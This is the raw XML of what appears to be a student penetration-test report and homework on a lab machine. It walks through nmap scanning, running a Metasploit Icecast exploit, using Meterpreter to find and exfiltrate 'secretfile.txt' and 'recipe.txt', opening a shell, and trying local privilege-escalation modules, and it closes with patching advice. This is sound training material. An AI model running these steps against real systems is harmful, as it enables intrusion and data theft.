        </w:rPr>
        <w:t xml:space="preserve"> to run while connected</w:t>
      </w:r>
      <w:r w:rsidR="00776929">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D305AFD" w14:textId="117ECEE2" w:rsidR="00776929" w:rsidRDefault="00794E93" w:rsidP="001E632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The first was </w:t>
      </w:r>
      <w:r w:rsidR="0076570D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>exploit/windows/local/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0076570D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ikeext_service</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0076570D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="002446C2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>This would not work</w:t>
      </w:r>
      <w:r w:rsidR="0049780D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, as the exploit’s code states that it only works on installations of Windows Vista through Windows 8, and the target</w:t>
      </w:r>
      <w:r w:rsidR="001E632D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> was running Windows 10.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD81291" w14:textId="2A0507BF" w:rsidR="001E632D" w:rsidRPr="003749F2" w:rsidRDefault="001E632D" w:rsidP="001E632D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second was exploit/windows/local/ms16_075_reflection.</w:t>
      </w:r>
      <w:r w:rsidR="000E6CCB">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> However, this exploit aborts when ran due to Session/Target Arch mismatch, saying that WOW64 is not supported.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004FE049" w14:textId="2216AE8C" w:rsidR="00827D5A" w:rsidRPr="003749F2" w:rsidRDefault="00827D5A" w:rsidP="00A734A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 other vulnerabilities have been discovered </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>as of yet</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5D2FD7" w14:textId="34FB5E28" w:rsidR="00484430" w:rsidRPr="003749F2" w:rsidRDefault="00484430" w:rsidP="00A734A3">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CDEB3A0" w14:textId="6E618B85" w:rsidR="00484430" w:rsidRPr="003749F2" w:rsidRDefault="00484430" w:rsidP="00A734A3">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63BD4CAD" w14:textId="23560322" w:rsidR="00484430" w:rsidRDefault="00484430" w:rsidP="00484430"/>
    <w:p w14:paraId="527C35F1" w14:textId="3363413C" w:rsidR="00484430" w:rsidRDefault="00484430" w:rsidP="00484430">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754005E0" w14:textId="0C0D8DF0" w:rsidR="00484430" w:rsidRDefault="00484430" w:rsidP="00484430"/>
    <w:p w14:paraId="3D35FC2A" w14:textId="3265FF1B" w:rsidR="00484430" w:rsidRPr="00834889" w:rsidRDefault="00834889" w:rsidP="00C43B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 is imperative that</w:t>
      </w:r>
      <w:r w:rsidR="00710F62">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, should</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> GoodCorp’s C</w:t>
      </w:r>
      <w:r w:rsidR="00FF71D7">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>EO</w:t>
      </w:r>
      <w:r w:rsidR="00710F62">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> wish to continue using Icecast,</w:t>
      </w:r>
      <w:r w:rsidR="00E23219">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> he</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00FF71D7">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>update</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00FF71D7">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C43B49">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="00FF71D7">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cecast on his laptop</w:t>
      </w:r>
      <w:r w:rsidR="00C43B49">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the newest version</w:t>
      </w:r>
      <w:r w:rsidR="00E23219">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00C43B49">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E23219">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>With the newest version,</w:t>
      </w:r>
      <w:r w:rsidR="00C43B49">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the buffer overflow vulnerability has been patched. </w:t>
      </w:r>
      <w:r w:rsidR="009D1251">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>It is</w:t>
      </w:r>
      <w:r w:rsidR="00E23219">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> further</w:t>
      </w:r>
      <w:r w:rsidR="009D1251">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> recommended that all the machine’s software be updated regularly, to </w:t>
      </w:r>
      <w:r w:rsidR="006D6383">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>reduce th</w:t>
      </w:r>
      <w:r w:rsidR="00592F28">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">e risk of potential vulnerabilities. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF344E2" w14:textId="17AF8E47" w:rsidR="00484430" w:rsidRDefault="00484430" w:rsidP="00A734A3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EDDB365" w14:textId="62A79B36" w:rsidR="00484430" w:rsidRDefault="00484430" w:rsidP="00A734A3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66AC3385" w14:textId="6ED912E6" w:rsidR="00484430" w:rsidRDefault="00484430" w:rsidP="00A734A3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24C4E6CF" w14:textId="5660D1C4" w:rsidR="00291B53" w:rsidRDefault="00291B53">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5656B90E" w14:textId="79CC002C" w:rsidR="006D6383" w:rsidRPr="00592F28" w:rsidRDefault="00592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Homework questions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AADB6B8" w14:textId="77777777" w:rsidR="00AF65E7" w:rsidRDefault="00AF65E7" w:rsidP="00AF65E7">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Perform a service and version scan using Nmap to determine which services are up and running:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1547751C" w14:textId="77777777" w:rsidR="00AF65E7" w:rsidRDefault="00AF65E7" w:rsidP="00AF65E7">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Run the Nmap command that performs a service and version scan against the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0830359E" w14:textId="7BB61FF8" w:rsidR="00B2651C" w:rsidRDefault="00AF65E7" w:rsidP="00A261D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hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Answer:</w:t>
      </w:r>
      <w:r w:rsidR="00020184" w:rsidRPr="00B26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184" w:rsidRPr="00B2651C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="00020184" w:rsidRPr="00B2651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020184" w:rsidRPr="00B2651C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20184" w:rsidRPr="00B2651C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.</w:t>
      </w:r>
      <w:r w:rsidR="00972C43" w:rsidRPr="00B2651C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0.2</w:t>
      </w:r>
      <w:r w:rsidR="00D01AB6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00B2651C" w:rsidRPr="00B26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5B14F" w14:textId="77777777" w:rsidR="00B2651C" w:rsidRPr="00B2651C" w:rsidRDefault="00B2651C" w:rsidP="00B2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From the previous step, we see that the Icecast service is running. Let's start by attacking that service. Search for any Icecast exploits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF00567" w14:textId="77777777" w:rsidR="00B2651C" w:rsidRPr="00B2651C" w:rsidRDefault="00B2651C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B2651C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SearchSploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 commands to show available Icecast exploits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660C3B39" w14:textId="7882689C" w:rsidR="00B2651C" w:rsidRPr="00B2651C" w:rsidRDefault="00B2651C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0D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6CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>searchsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000D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6CF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</w:p>
    <w:p w14:paraId="7E48EED1" w14:textId="77777777" w:rsidR="00B2651C" w:rsidRPr="00B2651C" w:rsidRDefault="00B2651C" w:rsidP="00B2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Now that we know which exploits are available to us, let's start Metasploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFEC475" w14:textId="77777777" w:rsidR="00B2651C" w:rsidRPr="00B2651C" w:rsidRDefault="00B2651C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Run the command that starts Metasploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC39226" w14:textId="49C2FAAD" w:rsidR="00B2651C" w:rsidRPr="00B2651C" w:rsidRDefault="00B2651C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EA2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2F77">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4FCA86E2" w14:textId="77777777" w:rsidR="00B2651C" w:rsidRPr="00B2651C" w:rsidRDefault="00B2651C" w:rsidP="00B2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Search for the Icecast module and load it for use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A56618" w14:textId="77777777" w:rsidR="00B2651C" w:rsidRPr="00B2651C" w:rsidRDefault="00B2651C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Run the command to search for the Icecast module:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4A5FF8" w14:textId="57A28002" w:rsidR="00B2651C" w:rsidRPr="00B2651C" w:rsidRDefault="00B2651C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C00F49">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C00F49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</w:p>
    <w:p w14:paraId="335057E1" w14:textId="037934F0" w:rsidR="00B2651C" w:rsidRPr="00B2651C" w:rsidRDefault="00B2651C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Run the command to use the Icecast module:</w:t>
      </w:r>
      <w:r w:rsidR="00B44BA0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B44BA0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</w:p>
    <w:p w14:paraId="2C4821B7" w14:textId="77777777" w:rsidR="00B2651C" w:rsidRPr="00B2651C" w:rsidRDefault="00B2651C" w:rsidP="00B2651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 Instead of copying the entire path to the module, you can use the number in front of it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66422E30" w14:textId="54C309DD" w:rsidR="00B2651C" w:rsidRPr="00B2651C" w:rsidRDefault="00B2651C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6E1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1C13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6E1CE9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13F2D6EF" w14:textId="77777777" w:rsidR="00B2651C" w:rsidRPr="00B2651C" w:rsidRDefault="00B2651C" w:rsidP="00B2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B2651C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RHOST</w:t>
      </w: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 to the target machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662C4D16" w14:textId="77777777" w:rsidR="00B2651C" w:rsidRPr="00B2651C" w:rsidRDefault="00B2651C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Run the command that sets the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B2651C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RHOST</w:t>
      </w:r>
      <w:r w:rsidRPr="00B2651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964305" w14:textId="34079AAB" w:rsidR="00B2651C" w:rsidRPr="00B2651C" w:rsidRDefault="00B2651C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6E1CE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> set RHOSTS 192.168.0.20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B960496" w14:textId="77777777" w:rsidR="00B2651C" w:rsidRPr="00B2651C" w:rsidRDefault="00B2651C" w:rsidP="00B2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Run the Icecast exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053ACC4E" w14:textId="77777777" w:rsidR="00B2651C" w:rsidRPr="00B2651C" w:rsidRDefault="00B2651C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Run the command that runs the Icecast exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBC8FB2" w14:textId="529DB573" w:rsidR="00B2651C" w:rsidRPr="00B2651C" w:rsidRDefault="00B2651C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127EE7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE184D1" w14:textId="77777777" w:rsidR="00B2651C" w:rsidRPr="00B2651C" w:rsidRDefault="00B2651C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Run the command that performs a search for the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B2651C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>secretfile.txt</w:t>
      </w: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 on the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B12802" w14:textId="41737580" w:rsidR="00B2651C" w:rsidRDefault="00B2651C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C2638E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> search -f *secretfile.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21142C71" w14:textId="77777777" w:rsidR="00034082" w:rsidRPr="00B2651C" w:rsidRDefault="00034082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858A5A7" w14:textId="77777777" w:rsidR="00B2651C" w:rsidRPr="00B2651C" w:rsidRDefault="00B2651C" w:rsidP="00B2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You should now have a Meterpreter session open.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD7B1BD" w14:textId="77777777" w:rsidR="00B2651C" w:rsidRPr="00B2651C" w:rsidRDefault="00B2651C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Run the command to performs a search for the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B2651C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>recipe.txt</w:t>
      </w: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 on the target:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCA70BC" w14:textId="01D6923A" w:rsidR="00B2651C" w:rsidRPr="00B2651C" w:rsidRDefault="00B2651C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034082">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> search -f *recipe.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D53A44E" w14:textId="77777777" w:rsidR="00B2651C" w:rsidRPr="00B2651C" w:rsidRDefault="00B2651C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: Run the command that exfiltrates the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B2651C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>recipe*.txt</w:t>
      </w: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4CD30D2A" w14:textId="77777777" w:rsidR="00B2651C" w:rsidRPr="00B2651C" w:rsidRDefault="00B2651C" w:rsidP="00B2651C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14:paraId="57ACF360" w14:textId="77777777" w:rsidR="00B2651C" w:rsidRPr="00B2651C" w:rsidRDefault="00B2651C" w:rsidP="00B26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You can also use Meterpreter's local exploit suggester to find possible exploits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21019207" w14:textId="16109E76" w:rsidR="00B2651C" w:rsidRPr="00B2651C" w:rsidRDefault="00182FB1" w:rsidP="00B26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</w:t>
      </w:r>
      <w:r w:rsidR="00D64D96">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>run post/multi/recon/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D64D96">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>local_exploit_suggester</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="544BDC73" w14:textId="77777777" w:rsidR="00B2651C" w:rsidRPr="00B2651C" w:rsidRDefault="00B2651C" w:rsidP="00B265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7D5513AC" w14:textId="77777777" w:rsidR="00B2651C" w:rsidRPr="00B2651C" w:rsidRDefault="00B2651C" w:rsidP="00B2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A. Run a Meterpreter </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B2651C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>post script</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B2651C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> that enumerates all logged on users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E09CE7" w14:textId="77777777" w:rsidR="00B2651C" w:rsidRPr="00B2651C" w:rsidRDefault="00B2651C" w:rsidP="00B265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14:paraId="1AF027A8" w14:textId="77777777" w:rsidR="00B2651C" w:rsidRPr="00B2651C" w:rsidRDefault="00B2651C" w:rsidP="00B2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B. Open a Meterpreter shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2E146D" w14:textId="5E58ED0D" w:rsidR="00B2651C" w:rsidRPr="00B2651C" w:rsidRDefault="00B2651C" w:rsidP="00B265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5B3288">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D25C83" w14:textId="77777777" w:rsidR="00B2651C" w:rsidRPr="00B2651C" w:rsidRDefault="00B2651C" w:rsidP="00B26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C. Run the command that displays the target's computer system information:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3533C8EF" w14:textId="00F08AEF" w:rsidR="00B2651C" w:rsidRPr="00B2651C" w:rsidRDefault="00B2651C" w:rsidP="00B265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51C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E41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A6B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7164697E" w14:textId="1EB04D45" w:rsidR="00AF65E7" w:rsidRDefault="00AF65E7" w:rsidP="00AF65E7">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20B9332C" w14:textId="77777777" w:rsidR="00484430" w:rsidRPr="00A734A3" w:rsidRDefault="00484430" w:rsidP="00AF65E7"/>
    <w:sectPr w:rsidR="00484430" w:rsidRPr="00A7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15FD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8F9A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87AF4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4DA0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F6B0B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="074AE2E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600531019">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1465391727">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="157130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F3"/>
    <w:rsid w:val="00005741"/>
    <w:rsid w:val="00020184"/>
    <w:rsid w:val="00020EF0"/>
    <w:rsid w:val="00034082"/>
    <w:rsid w:val="00074ED1"/>
    <w:rsid w:val="000D56CF"/>
    <w:rsid w:val="000E6CCB"/>
    <w:rsid w:val="00127BB5"/>
    <w:rsid w:val="00127EE7"/>
    <w:rsid w:val="00182FB1"/>
    <w:rsid w:val="001970EF"/>
    <w:rsid w:val="001A4701"/>
    <w:rsid w:val="001E632D"/>
    <w:rsid w:val="002446C2"/>
    <w:rsid w:val="00291B53"/>
    <w:rsid w:val="00325C8F"/>
    <w:rsid w:val="003363AA"/>
    <w:rsid w:val="00343363"/>
    <w:rsid w:val="00355622"/>
    <w:rsid w:val="003749F2"/>
    <w:rsid w:val="003F748E"/>
    <w:rsid w:val="004443C3"/>
    <w:rsid w:val="00454438"/>
    <w:rsid w:val="00484430"/>
    <w:rsid w:val="00494555"/>
    <w:rsid w:val="0049780D"/>
    <w:rsid w:val="00541DCB"/>
    <w:rsid w:val="00592F28"/>
    <w:rsid w:val="005B3288"/>
    <w:rsid w:val="005B492C"/>
    <w:rsid w:val="005D3306"/>
    <w:rsid w:val="00660FED"/>
    <w:rsid w:val="006D6383"/>
    <w:rsid w:val="006D748D"/>
    <w:rsid w:val="006E1CE9"/>
    <w:rsid w:val="007108B2"/>
    <w:rsid w:val="00710F62"/>
    <w:rsid w:val="00740B0C"/>
    <w:rsid w:val="0076570D"/>
    <w:rsid w:val="00776929"/>
    <w:rsid w:val="00794E93"/>
    <w:rsid w:val="007B656A"/>
    <w:rsid w:val="00827D5A"/>
    <w:rsid w:val="00834889"/>
    <w:rsid w:val="008E387A"/>
    <w:rsid w:val="00972C43"/>
    <w:rsid w:val="009A6D52"/>
    <w:rsid w:val="009D1251"/>
    <w:rsid w:val="009F589A"/>
    <w:rsid w:val="00A261D2"/>
    <w:rsid w:val="00A31C13"/>
    <w:rsid w:val="00A5733F"/>
    <w:rsid w:val="00A626CC"/>
    <w:rsid w:val="00A72DBF"/>
    <w:rsid w:val="00A734A3"/>
    <w:rsid w:val="00A77A14"/>
    <w:rsid w:val="00AF65E7"/>
    <w:rsid w:val="00B21867"/>
    <w:rsid w:val="00B2651C"/>
    <w:rsid w:val="00B3293C"/>
    <w:rsid w:val="00B44BA0"/>
    <w:rsid w:val="00B5044C"/>
    <w:rsid w:val="00B7585C"/>
    <w:rsid w:val="00BC4C7A"/>
    <w:rsid w:val="00C00F49"/>
    <w:rsid w:val="00C2638E"/>
    <w:rsid w:val="00C43B49"/>
    <w:rsid w:val="00C52215"/>
    <w:rsid w:val="00CD4283"/>
    <w:rsid w:val="00D01AB6"/>
    <w:rsid w:val="00D1714B"/>
    <w:rsid w:val="00D64D96"/>
    <w:rsid w:val="00D819D7"/>
    <w:rsid w:val="00E12A60"/>
    <w:rsid w:val="00E23219"/>
    <w:rsid w:val="00E41A6B"/>
    <w:rsid w:val="00E70100"/>
    <w:rsid w:val="00E92F1F"/>
    <w:rsid w:val="00EA2F77"/>
    <w:rsid w:val="00EB655B"/>
    <w:rsid w:val="00EC6924"/>
    <w:rsid w:val="00EF1EF3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F3F9"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{34C87175-C5CB-4ADA-A5A0-F16A390A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73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4A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73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73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3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4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5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exSalvucci@GoodSecur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Hausknecht</dc:creator>
  <cp:keywords/>
  <dc:description/>
